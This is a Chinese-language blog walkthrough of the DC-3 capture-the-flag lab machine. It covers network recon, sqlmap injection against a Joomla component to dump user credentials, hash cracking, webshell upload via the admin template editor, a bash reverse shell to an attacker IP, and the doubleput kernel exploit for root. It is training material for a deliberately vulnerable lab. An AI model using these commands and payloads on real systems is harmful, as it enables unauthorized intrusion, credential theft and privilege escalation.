<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="信息搜集">
<meta property="og:type" content="article">
<meta property="og:title" content="dc-3">
<meta property="og:url" content="http://example.com/2025/04/04/dc-3/index.html">
<meta property="og:site_name" content="jujub3">
<meta property="og:description" content="信息搜集">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/dc-3/1733123089958-5a6f29cc-5711-401b-a2cb-c9a0e7f18277.png">
<meta property="og:image" content="http://example.com/dc-3/1733123135427-f163ef04-6965-40b3-b4b8-32d21042476e.png">
<meta property="og:image" content="http://example.com/dc-3/1733123808719-ecb73396-f3e0-482d-b9b6-070c2eb67e60.png">
<meta property="og:image" content="http://example.com/dc-3/1733124958579-1ead4a4b-37af-474f-be29-f1cf6f12378f.png">
<meta property="og:image" content="http://example.com/dc-3/1733124332376-4ddacada-a869-4101-b3f1-2af07f503c15.png">
<meta property="og:image" content="http://example.com/dc-3/1733125363380-e372c7b3-dd0c-4e62-9cff-aa430f2a19f6.png">
<meta property="og:image" content="http://example.com/dc-3/1733130284362-aadc5f0e-7eb7-42db-b852-cc72972eed25.png">
<meta property="og:image" content="http://example.com/dc-3/1733130690762-ea5978e1-b7d5-449f-af8f-1fd2ceab9213.png">
<meta property="og:image" content="http://example.com/dc-3/1733131768937-cf91299b-2ee5-4f7a-8157-d6b721a8f497.png">
<meta property="og:image" content="http://example.com/dc-3/1733131840123-28f8f88f-efb9-43d7-8a4f-c44aeaae6db5.png">
<meta property="og:image" content="http://example.com/dc-3/1733133099562-c99bb81c-54f7-4910-9ccc-afa24f2503ad.png">
<meta property="og:image" content="http://example.com/dc-3/1733133263418-97c84f6b-7f1e-4606-a656-a898f72c1a66.png">
<meta property="og:image" content="http://example.com/dc-3/1733292084534-373c7741-2f53-4b9e-8db6-417839d20cf0.png">
<meta property="og:image" content="http://example.com/dc-3/1733292105744-1ac33db7-0445-4d20-9790-ff96d69cbf1c.png">
<meta property="og:image" content="http://example.com/dc-3/1733293182864-f835b46e-8907-449f-aa19-22f007495bcb.png">
<meta property="og:image" content="http://example.com/dc-3/1733293328651-fdaa46b0-32cf-49ae-b52b-098e0f2c98f5.png">
<meta property="og:image" content="http://example.com/dc-3/1733293690081-806f0a81-206c-4ab9-9555-c4f0c84b8ddc.png">
<meta property="og:image" content="http://example.com/dc-3/1733294076000-fb63c970-23d8-46d8-af8e-50508ccacada.png">
<meta property="og:image" content="http://example.com/dc-3/1733295262561-d52a6027-e428-4b2c-ac1d-9cbb33da2e6a.png">
<meta property="og:image" content="http://example.com/dc-3/1733295378232-a126b7b4-e9c2-4a23-8ba9-5dc881c9da0b.png">
<meta property="og:image" content="http://example.com/dc-3/1733295449730-1dc4d555-c01f-48a9-933e-e9400e7cf0d4.png">
<meta property="og:image" content="http://example.com/dc-3/1733295915004-0b637bd9-cff5-4e49-bbe2-6724499a9f04.png">
<meta property="og:image" content="http://example.com/dc-3/1733295981623-1ab74bc9-96ba-4320-9b7f-3e04f8a98470.png">
<meta property="og:image" content="http://example.com/dc-3/1733296038645-c094b996-3b6a-4208-947b-85061a34df61.png">
<meta property="og:image" content="http://example.com/dc-3/1733296110452-a64c43ad-7243-47b8-99e4-fb85b4d80bca.png">
<meta property="og:image" content="http://example.com/dc-3/1733296264562-0a9229c1-20fc-4ce7-bf5c-711f3c3d9e97.png">
<meta property="article:published_time" content="2025-04-04T09:38:34.000Z">
<meta property="article:modified_time" content="2025-04-04T09:41:16.269Z">
<meta property="article:author" content="jujub3">
<meta property="article:tag" content="DC">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/dc-3/1733123089958-5a6f29cc-5711-401b-a2cb-c9a0e7f18277.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/head.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/head.jpg">
        
      
    
    <!-- title -->
    <title>dc-3</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2025/04/04/dc-4/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2025/04/04/dc-2/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/04/dc-3/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/04/dc-3/&text=dc-3"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/04/dc-3/&is_video=false&description=dc-3"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=dc-3&body=Check out this article: http://example.com/2025/04/04/dc-3/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/04/dc-3/&name=dc-3&description=&lt;p&gt;信息搜集&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/04/dc-3/&t=dc-3"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        dc-3
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">jujub3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-04T09:38:34.000Z" class="dt-published" itemprop="datePublished">2025-04-04</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/DC/" rel="tag">DC</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>信息搜集</p>
<span id="more"></span>

<p><img src="/../dc-3/1733123089958-5a6f29cc-5711-401b-a2cb-c9a0e7f18277.png" alt="img"></p>
<p>得到mac地址：00:0C:29:5A:61:54</p>
<p>然后通过arp-scan -l 扫描与kali同一网段上的ip</p>
<p><img src="/../dc-3/1733123135427-f163ef04-6965-40b3-b4b8-32d21042476e.png" alt="img"></p>
<p>得到ip地址：192.168.126.141</p>
<p>接着扫描这个ip所开放的端口</p>
<p>命令：nmap -A 192.168.126.141 -p 1-65535 -oN nmap.A</p>
<p><img src="/../dc-3/1733123808719-ecb73396-f3e0-482d-b9b6-070c2eb67e60.png" alt="img"></p>
<p>这里可以看到有开放的80端口</p>
<p>whatweb -v ip</p>
<p><img src="/../dc-3/1733124958579-1ead4a4b-37af-474f-be29-f1cf6f12378f.png" alt="img"></p>
<p>发现这个架构是一个Joomla</p>
<p><img src="/../dc-3/1733124332376-4ddacada-a869-4101-b3f1-2af07f503c15.png" alt="img"></p>
<p>最后得到一个信息，这次只有一个flag，然后最后要获得根目录权限</p>
<p>由上面得到这个网站的架构为Joomla，这里需要用到一个这个框架的扫描工具，joomscan，kali上需要自行安装</p>
<p>命令：</p>
<p>apt-get install joomscan -y</p>
<p>安装成功后使用命令：joomscan –url  <a target="_blank" rel="noopener" href="http://192.168.126.141/">http://192.168.126.141/</a>  进行扫描</p>
<p><img src="/../dc-3/1733125363380-e372c7b3-dd0c-4e62-9cff-aa430f2a19f6.png" alt="img"></p>
<p>或者也可以使用其他漏洞工具进行扫描</p>
<p>dirb <a target="_blank" rel="noopener" href="http://192.168.126.141/">http://192.168.126.141/</a></p>
<p>dirsearch -u  <a target="_blank" rel="noopener" href="http://192.168.126.141/">http://192.168.126.141/</a></p>
<p>最后根据cms版本在网上找出来了一个sql注入漏洞，	</p>
<p>直接上sqlmap，爆破当前数库：</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.126.141/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=">http://192.168.126.141/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=</a>“ –current-db</p>
<p><img src="/../dc-3/1733130284362-aadc5f0e-7eb7-42db-b852-cc72972eed25.png" alt="img"></p>
<p>得到数据库：joomladb</p>
<p>然后爆破表名：</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.126.141/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=">http://192.168.126.141/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=</a>“ -D joomladb -tables</p>
<p><img src="/../dc-3/1733130690762-ea5978e1-b7d5-449f-af8f-1fd2ceab9213.png" alt="img"></p>
<p>找到了一个   #__users</p>
<p>接着爆破列名，记得在这个表名加上双引号，防止#将后面的内容给注释掉</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.126.141/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=">http://192.168.126.141/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=</a>“ -D “joomladb” -T “#__users” –columns</p>
<p><img src="/../dc-3/1733131768937-cf91299b-2ee5-4f7a-8157-d6b721a8f497.png" alt="img"></p>
<p>然后直接dump  username 和password</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.126.141/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=">http://192.168.126.141/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=</a>“ -D “joomladb” -T “#__users” -C “username,password” –dump</p>
<p><img src="/../dc-3/1733131840123-28f8f88f-efb9-43d7-8a4f-c44aeaae6db5.png" alt="img"></p>
<p>最后得到了一个账号跟密码，不过密码是经过加密的，需要用kali中自带的john来破解，</p>
<p>现在桌面上创建一个1.txt，然后将哈希值放进去，最后执行命令：</p>
<p>john  1.txt</p>
<p><img src="/../dc-3/1733133099562-c99bb81c-54f7-4910-9ccc-afa24f2503ad.png" alt="img"></p>
<p>最后得到密码为：snoopy</p>
<p>然后在administrator这个目录下登录进后台	</p>
<p><img src="/../dc-3/1733133263418-97c84f6b-7f1e-4606-a656-a898f72c1a66.png" alt="img"></p>
<p>然后在extensions部分可以上传文件</p>
<p><img src="/../dc-3/1733292084534-373c7741-2f53-4b9e-8db6-417839d20cf0.png" alt="img"></p>
<p>上传木马，最后成功连上<img src="/../dc-3/1733292105744-1ac33db7-0445-4d20-9790-ff96d69cbf1c.png" alt="img"></p>
<p><a target="_blank" rel="noopener" href="http://192.168.3.252/templates/beez3/html/a.php">http://192.168.3.252/templates/beez3/html/a.php</a></p>
<p>查看当前用户：whoami</p>
<p><img src="/../dc-3/1733293182864-f835b46e-8907-449f-aa19-22f007495bcb.png" alt="img"></p>
<p>www-data是一个低权用户。所以还需要提权</p>
<p>查看系统内核：uname -a</p>
<p><img src="/../dc-3/1733293328651-fdaa46b0-32cf-49ae-b52b-098e0f2c98f5.png" alt="img"></p>
<p>查看ubuntu发行版本：lsb-release -a</p>
<p><img src="/../dc-3/1733293690081-806f0a81-206c-4ab9-9555-c4f0c84b8ddc.png" alt="img"></p>
<p>为ubuntu16.04</p>
<p>查找漏洞：</p>
<p>searchsploit ubuntu 16.04 linux</p>
<p><img src="/../dc-3/1733294076000-fb63c970-23d8-46d8-af8e-50508ccacada.png" alt="img"></p>
<p>选择linux&#x2F;local&#x2F;39772.txt这个。</p>
<p>cat &#x2F;usr&#x2F;share&#x2F;exploitdb&#x2F;exploits&#x2F;linux&#x2F;local&#x2F;39772.txt</p>
<p>最后会得到一个下载方式：	</p>
<p><img src="/../dc-3/1733295262561-d52a6027-e428-4b2c-ac1d-9cbb33da2e6a.png" alt="img"></p>
<p>最后下载下来，将他放到html目录（templates）</p>
<p><img src="/../dc-3/1733295378232-a126b7b4-e9c2-4a23-8ba9-5dc881c9da0b.png" alt="img"></p>
<p>然后反弹shell，在kali上执行：nc -lvp 1234</p>
<p>蚁剑上执行：bash -c ‘bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.3.250&#x2F;1234 0&gt;&amp;1’ </p>
<p>拿到shell：</p>
<p><img src="/../dc-3/1733295449730-1dc4d555-c01f-48a9-933e-e9400e7cf0d4.png" alt="img"></p>
<p>将exploit.tar进行解压：tar -xvf exploit.tar</p>
<p><img src="/../dc-3/1733295915004-0b637bd9-cff5-4e49-bbe2-6724499a9f04.png" alt="img"></p>
<p>cd ebpf_mapfd_doubleput_exploit&#x2F;</p>
<p><img src="/../dc-3/1733295981623-1ab74bc9-96ba-4320-9b7f-3e04f8a98470.png" alt="img"></p>
<p>执行：.&#x2F;compile.sh</p>
<p><img src="/../dc-3/1733296038645-c094b996-3b6a-4208-947b-85061a34df61.png" alt="img"></p>
<p>执行完之后会多一个doubleput</p>
<p><img src="/../dc-3/1733296110452-a64c43ad-7243-47b8-99e4-fb85b4d80bca.png" alt="img">‘</p>
<p>接着继续执行doubleput：.&#x2F;doubleput</p>
<p>最后拥有root权限。就可以直接进入&#x2F;root，拿到最后的flag</p>
<p><img src="/../dc-3/1733296264562-0a9229c1-20fc-4ce7-bf5c-711f3c3d9e97.png" alt="img"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/04/dc-3/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/04/dc-3/&text=dc-3"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/04/dc-3/&is_video=false&description=dc-3"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=dc-3&body=Check out this article: http://example.com/2025/04/04/dc-3/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/04/dc-3/&title=dc-3"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/04/dc-3/&name=dc-3&description=&lt;p&gt;信息搜集&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/04/dc-3/&t=dc-3"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    jujub3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
